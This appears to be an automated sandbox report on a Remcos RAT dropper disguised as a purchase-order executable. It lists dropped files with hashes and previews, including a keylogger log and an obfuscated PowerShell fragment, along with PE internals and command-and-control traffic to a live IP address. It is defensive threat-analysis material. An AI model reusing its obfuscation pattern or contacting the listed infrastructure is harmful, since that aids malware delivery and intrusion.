                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                            Malicious:false
                                                                                            Preview:..

                                                                                            C:\Users\user\AppData\Roaming\mqerms.dat

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.341937514109179
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:6l+F8slHql55YcIeeDAlKe5q1gWAAe5q1gWAv:6l/slHUec8e5BWFe5BW+
                                                                                            MD5:B0BE059CD617302352CC046F6CC0220A
                                                                                            SHA1:06CF6C6B151EE7C8808C2AF6D177C3C0A3896980
                                                                                            SHA-256:60EFD41700D8318D03BEE12AC80FFCDA030EF4131A4CDD2B220FE5897EC65D2D
                                                                                            SHA-512:E53FA0FD6447D0F2BBAFDC7A007C36627E3AB200540C12EB85F7AB82B1DBA59ADBF037D432C403A83B38EDFA45533779F92A920351B14A382434F96EC7E3B13A
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                                                                            Preview:....[.2.0.2.4./.0.4./.1.9. .1.9.:.1.2.:.1.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Batteriforsynede\Trolddomsvirksomhederne\Laboredness.Fid

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):338559
                                                                                            Entropy (8bit):7.6756920287623895
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:I/ZImUfg//jtgN5B76EjlzSejH9nT+6zHItGazPLRtXhu3:ITj/xgN5B5jl3jH9nT+6TuGQVRhu3
                                                                                            MD5:FBA02C5C2E2B17B589D84B7D57D7A736
                                                                                            SHA1:251A31C2E3BCB544CE6431FCA1E14F4ACEF7FF42
                                                                                            SHA-256:274533CE689D15C8EE6611FEB429118E821E28010FD79FC57F055C0B7E0E7FF6
                                                                                            SHA-512:25C4B0532A4113899BE97CF62407948867670157470178607626193D34EB7EEE54C2DB72CA5D1ABCB560A4341526DE92A958A4D09102B942D0811C74ED67F09E
                                                                                            Malicious:false
                                                                                            Preview:..........r..>.....qqq......................R..................!!......w..........l................F.III........................................aa........................|....................................................S.............jjj....-................................mm.M.b........F...pp.........00........QQ..............@@@.......8888.................E.N.;;....g..............................g.UU........................6.K....mmm....................................................BB...].........Z..........A...66.............YYY........AA.hhh..................GGG...............555....XXXXXX..w.........!.....h.................6...Q.}}}.............P....................xxx........FFFF..........""".........>......... .... ........NN.ZZZ.[.N..........E..................TT......HH...........................J..:..+..........zz.....vv................((((...##..............................................................66.....o.....................KK.0......x......;...9.......].????..

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\bouillonterningens.skk

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1089
                                                                                            Entropy (8bit):4.741939006979892
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HE9gSo1DFGgLzDlcBo5AW02oIypXdMUKI:k9EThzOBo5Ar2ovSI
                                                                                            MD5:A5A3506D7A85C6A0834F9C3D27FCE6C9
                                                                                            SHA1:DC5600F7CCD5CAF8A924B70C2F45C1D7969F0E6B
                                                                                            SHA-256:6329AFA66841B081B1479BBF17BE5A6DAB5863E736093DA1398CCB4FD48C56EC
                                                                                            SHA-512:608B83DC77C28C663A9108B4F935E6DB82D470FA0392BD30FE9F7DC94E57D1BFAA5749F8ED3E489DD138FD12A2A6CBC488699660E0BFA7F24A1BD66DDAC1A1FB
                                                                                            Malicious:false
                                                                                            Preview:..............c.................O)D.3.b............2.....N.....H...1.X..-..."<............bl.......5......W.........W.....O..M.....>......m.....d...............C........-f................ ..p.F.~.....se....,...........c.T(....P.8..$.....n..:.....b...'T..g..............,.....1.W........T.>.i..V...8.....L...z...U..U......Q....h..g.........................(.2...-%....0..?......P..........w.x....D...............[...........r.....S....(..............F\....I.........0..."............#...?.^O..&~...w}.$..i........\...p....6e.....n....&.N....................t......i.....1......]...............r...........2.$L3..F..................,....V...Q..c.....;................c.................fw.......&....;......*....{.f....................~.............@...................v......}.;...\......).......c.xU...M_&..........w....9.Bn.I.....................X).........qE.,...H.../......J....~...y.+.0..............6...Q.T._.....{.>........r.^........U...........f.N......g.....H.....I\....e.[..........${

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\nondeferential.txt

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):501
                                                                                            Entropy (8bit):4.228739463953974
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:uHfW+5O384CuCatmRJ+8zBDg7epfF4HzZ/0d6Z9ya3Bl1SF9hm:u++5Ok7XwLep9kzZ89a3Jyhm
                                                                                            MD5:368D84FCACBE7199AAD3FD09C7DF14A7
                                                                                            SHA1:A5CA69A9DB10AFF8E8B7069B1800B8555B841C4D
                                                                                            SHA-256:8BFFAB9063FF62AD2BE0622F70C9608FC039FCB4A4B1917081BD90ADC5C36935
                                                                                            SHA-512:9E27DBB488E00F1690086B6C1D28E1EEBFE4C1415A7A218DE93BAF210BAA26D7D8C484273AE51D269403B844C11C37832349204FAA1F7CB139585B9F7E26878E
                                                                                            Malicious:false
                                                                                            Preview:cyclical canakin flebotomy subcandidness intervalhalveringernes noncelebration dicaryon compsothlypidae gastritissen..jasigerens quadroons rubinens stemmeberettiget glimrede udkoksede,farvellets mesenteriolum statsskove gennemsgningerne frtidspensionisters investeringsskema rendezvouser tilbagekbet underfactor barnesprog..tyndtflydenhed faradmeter enepiger youngers maddle,sildefangsts sportshals climatal diakritiske.byggestenen omplantedes uninstructedly saluterende mennonist identitetsantagelse.

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):533858
                                                                                            Entropy (8bit):7.5110798850016085
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu
                                                                                            MD5:0E1262A4CE5AC71AD5B8DF93030D61B5
                                                                                            SHA1:EFB918EE62FF5CCA7BDC10D180C7F7837C8E2B6B
                                                                                            SHA-256:A90C7B4223BCA6A28296894C66845DE8FB61E7028B9C45AB8E0EC7D27DB0BF71
                                                                                            SHA-512:A799094BDAE022E92F77C002DC03D0DA004982AAA973EFE35DC6E72E40A5E9549927C7A831331218BB15478F24CC0B7ED9E7D94A0D1F3ABA103B49E68BD0064D
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@.......................................@..........................................@..............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc.......@......................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten\z14Novospedidosdecompra_Profil_4903.exe:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:false
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Holomorph196.mil

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:BS image, Version -29696, Quantization -30208, (Decompresses to 153 words)
                                                                                            Category:dropped
                                                                                            Size (bytes):4056
                                                                                            Entropy (8bit):4.860550085125353
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:prxhfa2NwGYhNj+RR6UclY+w7RXMru7+AdWrY9NaR95:pr/lNChNy7cCtRcS2eI95
                                                                                            MD5:4E679D550C231C35094FEFB645F0D0B4
                                                                                            SHA1:26E9E728DCDA9CE0A9427DE64A8365DDB24090E2
                                                                                            SHA-256:3FCA5795690F2D6553CA5845BF9B122051AB8B7C05896078541A14DE00FB6BD7
                                                                                            SHA-512:E0380BE7BED7AB78208FA0694FEDD3F5512BC6DDA0C29C3895DB4E6F814FC719DCFE933D1EC871B75FBD7B436C2C57BB0FCF9ACFB64E171C01C022B36F73F4BA
                                                                                            Malicious:false
                                                                                            Preview:...8................................J........k.f..U......X...`.........>.................}.._....8.\.Q....3+...[...^..../..I.....q.........Z..5....5y.&....-.....B......*..............Blm..]...b.x^.....v..............&ms...}.......]v.......M...R............Uy...........................m.......U............g..................'.=e..&..@..l........S...8..Q.....f.............!.b........ t...........P............&.....<...b....d..V.....0........:y.{...........f."..C.*............... ./..${.......W.......x......>%.S...ew4...8.N.P...'...^.......7'.................X5....................l...W.L....<.,.-....!....U.[.....j..".......-..3.....`K.E.&..........L..>.<.S.X..........8..!L..R|.. ..h...............$...........S.l..............Y.T.....o..j.G..................\..Ig.\..b..Z......f.-m....>.....C.....g.......mb............F................1..............S...n.......#............&.....g....K.....5......z........2.......,.....q.+.jU`......=.,.........J.5......4.............`......

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Hustle118\Foundering\Ljtnanterne\Unstraightness\Slumretppe.hor

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4996
                                                                                            Entropy (8bit):4.9612676235687445
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:v48YsRVEpylVQratXvDeUeYSi80KFuwczSfTS48Bacs/OMRK2BL0Ab:v4XsRVCr0b/80KFuwNnA8OMRK2R0Ab
                                                                                            MD5:3BF82F450A0DFD86F29536257623E2AD
                                                                                            SHA1:286877538EC1D1D41A9819596B41B0289509CB51
                                                                                            SHA-256:614BB44D24BBB3B890649867E13FB15D86E5EA73179FD44E716B10FFCAA3C7C0
                                                                                            SHA-512:8B4CAD6568B4503E6E4171D22B8DB89E54449BF98D28C0D4D9F207AAAF56005E3406C8160A8365037F36CC4A7E4C537455ED6632371E2104CB718EC18C13D3CB
                                                                                            Malicious:false
                                                                                            Preview:...._...................y....2.IJ.....?K.../....%...S.e...K....<.~..........W........C]q.................{...Z.....A..MiM=|..=..........a......3...)....x?..w......`.............T..f.....J...p.......b....g.........................)........L........?.0.........4:.#...........6........m.........Y......x.#......hm9.{....[......L......l....x....!.....k..k..aA..............._.g..2H.R...........(.......=.......H............<.B....^......;.....p.Hv. (....>..^.....k.oJ..........wED.......1.)?.."......................g.W.R.m.D........x..W........2...Gu.W.....~..%......o..*.........%.Y......8........F...*.....O..g.5.?.......E....u..J.......,..4...uB.................'w.>....o....$.....;./........(x.Eb..............G+...0mu..........~.......w.......uE...............f.@.$....O..1...6-....Q'............V........P..........w.l......#........................J.g..5F......................;..m......a...u..O........U..................<....1......y.............4.E........`.......~..........U

                                                                                            C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File Type:ASCII text, with very long lines (61111), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):61111
                                                                                            Entropy (8bit):5.357134631016563
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:oKohIDhrU/xqIsVWUQ7IQp0lYmDc+m4PsrHLc:oJhI5U/xKWLpwon4Ps7Lc
                                                                                            MD5:867B6E69EAF64D49C92A00EFE2F3484A
                                                                                            SHA1:57E409C3C4EC17F05DE4B6900300C6FFB22447C7
                                                                                            SHA-256:554A9D36104F6FE2C57EBEF379F96ADB5205F4652780C0459DB40E676F5EFA1C
                                                                                            SHA-512:3D075D6850562B2F68503E48F9349A50DCF65E69626B85B5312BF0BD6938B3B433CAFB3ED4F885B392C4157B6997613EA551729A35028F5BE1151AC3FEDA1856
                                                                                            Malicious:true
                                                                                            Preview:$Myelopathy=$Cantabrigian;<#Snedkre Unintelligently Yengeese Heirless Aktiviteternes Hetmanship Unvizarded #><#Truppenes Forjttendes Aspargessuppernes #><#Irrepressibleness Nebulisations Brndstofledningerne Kretid Amt Bjrnekloers Fygningers #><#Oho Saddelpladsens Kakler Permittxjr #><#Anyway furmente Cirkle Krematorier Orients Cpu Ultraenthusiastic #><#Footpaths ingredience Stoppende Ventriloquous #><#prioriteringerne Overretssagfrernes Throbless Licorne #><#Brobyvrk Troskabslfterne ldigste #><#Rekvirenters Incredulousness Swordstick #><#Blastoporic Storebroderens Comprehends Mearstone Civilingenirens #><#Uroende Fraseringens Sportsstrmpers Antioxygen Innerwing Overprsidents #><#Sensibiliserende Brahmanens Kitsas #><#Vaporiferousness Testprocedurernes Carvings #><#Signposts Supratonsillar Vgtfyldes privatiseringen Kviltningers Butyrousness Vaduz #><#Whitehearted Routings Propan Botilde #><#mademoiselle Sanemonens Rnkesmed #><#Lovrevisioners Diadrom Transistor Chechia Humeroscapular Thi

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.5110798850016085
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:z14Novospedidosdecompra_Profil_4903.exe
                                                                                            File size:533'858 bytes
                                                                                            MD5:0e1262a4ce5ac71ad5b8df93030d61b5
                                                                                            SHA1:efb918ee62ff5cca7bdc10d180c7f7837c8e2b6b
                                                                                            SHA256:a90c7b4223bca6a28296894c66845de8fb61e7028b9c45ab8e0ec7d27db0bf71
                                                                                            SHA512:a799094bdae022e92f77c002dc03d0da004982aaa973efe35dc6e72e40a5e9549927c7a831331218bb15478f24cc0b7ed9e7d94a0d1f3aba103b49e68bd0064d
                                                                                            SSDEEP:12288:fzA/ggggjrBj93vPbk8tGtP7ocMzAGrP+jp:U/ggggj9jpvY84mAGrPu
                                                                                            TLSH:5FB4E1ABEB908526D93807B4E973C1181B749C963E71DF4F07897460AFF738238A9617
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@

                                                                                            File Icon

                                                                                            Icon Hash:82aea280f0fcfc75

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4032a0
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 000002D4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            push 00000020h
                                                                                            pop edi
                                                                                            xor ebx, ebx
                                                                                            push 00008001h
                                                                                            mov dword ptr [esp+14h], ebx
                                                                                            mov dword ptr [esp+10h], 0040A2E0h
                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                            call dword ptr [004080B0h]
                                                                                            call dword ptr [004080ACh]
                                                                                            cmp ax, 00000006h
                                                                                            je 00007FF9C91B8023h
                                                                                            push ebx
                                                                                            call 00007FF9C91BB164h
                                                                                            cmp eax, ebx
                                                                                            je 00007FF9C91B8019h
                                                                                            push 00000C00h
                                                                                            call eax
                                                                                            mov esi, 004082B8h
                                                                                            push esi
                                                                                            call 00007FF9C91BB0DEh
                                                                                            push esi
                                                                                            call dword ptr [0040815Ch]
                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                            cmp byte ptr [esi], 00000000h
                                                                                            jne 00007FF9C91B7FFCh
                                                                                            push ebp
                                                                                            push 00000009h
                                                                                            call 00007FF9C91BB136h
                                                                                            push 00000007h
                                                                                            call 00007FF9C91BB12Fh
                                                                                            mov dword ptr [00434EE4h], eax
                                                                                            call dword ptr [0040803Ch]
                                                                                            push ebx
                                                                                            call dword ptr [004082A4h]
                                                                                            mov dword ptr [00434F98h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 000002B4h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 0042B208h
                                                                                            call dword ptr [00408188h]
                                                                                            push 0040A2C8h
                                                                                            push 00433EE0h
                                                                                            call 00007FF9C91BAD18h
                                                                                            call dword ptr [004080A8h]
                                                                                            mov ebp, 0043F000h
                                                                                            push eax
                                                                                            push ebp
                                                                                            call 00007FF9C91BAD06h
                                                                                            push ebx
                                                                                            call dword ptr [00408174h]
                                                                                            add word ptr [eax], 0000h

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x283d0.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x637b0x6400967d0e18ece4b8dcc63ec9d544660136False0.671484375data6.484796945043301IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x80000x14b00x1600d6b0bc2db2de2a3dd996fda6539cef0eFalse0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0xa0000x2afd80x6002aa587c909999ca52be17d0f1ffbd186False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x350000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x540000x283d00x284001ae715fef83c68eac2d6a2aa7a20fec2False0.28579313858695654data5.764915315933482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x543580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.20579971607713238
                                                                                            RT_ICON0x64b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3141948707168383
                                                                                            RT_ICON0x6e0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.34639556377079483
                                                                                            RT_ICON0x734b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.31737128011336796
                                                                                            RT_ICON0x776d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42022821576763486
                                                                                            RT_ICON0x79c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.46083489681050654
                                                                                            RT_ICON0x7ad280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5704918032786885
                                                                                            RT_ICON0x7b6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6108156028368794
                                                                                            RT_DIALOG0x7bb180x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x7bc180x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x7bd380xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x7be000x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x7be600x76dataEnglishUnited States0.7542372881355932
                                                                                            RT_VERSION0x7bed80x1b8COM executable for DOSEnglishUnited States0.5295454545454545
                                                                                            RT_MANIFEST0x7c0900x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            04/19/24-19:12:11.492624TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response2987149738193.222.96.21192.168.2.4
                                                                                            04/19/24-19:12:11.262632TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin4973829871192.168.2.4193.222.96.21

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 19, 2024 19:12:08.806940079 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:08.806982040 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:08.807054043 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:08.860527992 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:08.860551119 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.092659950 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.092856884 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.238075972 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.238097906 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.238985062 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.239056110 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.289612055 CEST49737443192.168.2.4104.21.60.38
                                                                                            Apr 19, 2024 19:12:09.336118937 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414328098 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414452076 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414565086 CEST44349737104.21.60.38192.168.2.4
                                                                                            Apr 19, 2024 19:12:09.414613008 CEST49737443192.168.2.4104.21.60.38
